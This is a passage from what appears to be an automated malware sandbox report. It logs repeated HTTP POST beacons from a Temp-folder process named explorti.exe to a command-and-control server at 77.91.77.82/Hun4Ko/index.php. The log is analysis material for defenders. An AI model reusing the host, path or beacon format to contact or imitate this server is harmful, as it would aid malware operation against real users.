                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:42.952613115 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.44977777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:43.072515011 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:43.771044970 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:43.771687984 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:43.989423990 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.44977877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:44.103471994 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:44.812478065 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:44.813102961 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:45.038695097 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.44977977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:45.151015997 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:45.862473011 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:45.863101959 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:46.085939884 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.44978077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:46.197168112 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:46.923702955 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:46.925061941 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:47.153659105 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.44978177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:47.279233932 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:47.973948956 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:47.974554062 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:48.191167116 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.44978277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:48.309202909 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:49.001403093 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:49.002120972 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:49.218465090 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.44978377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:49.338002920 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:50.051719904 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:49 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:50.052386045 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:50.275393009 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.44978577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:50.385157108 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:51.114955902 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:51.115644932 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:51.344749928 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.44978677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:51.462860107 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:52.172797918 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:52.173520088 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:52.396946907 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.44978777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:52.509749889 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:53.201112986 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:53.203459024 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:53.419475079 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.44978877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:53.540865898 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:54.252053976 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:54.255899906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:54.475650072 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:54 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.44978977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:54.799326897 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:55.510452032 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
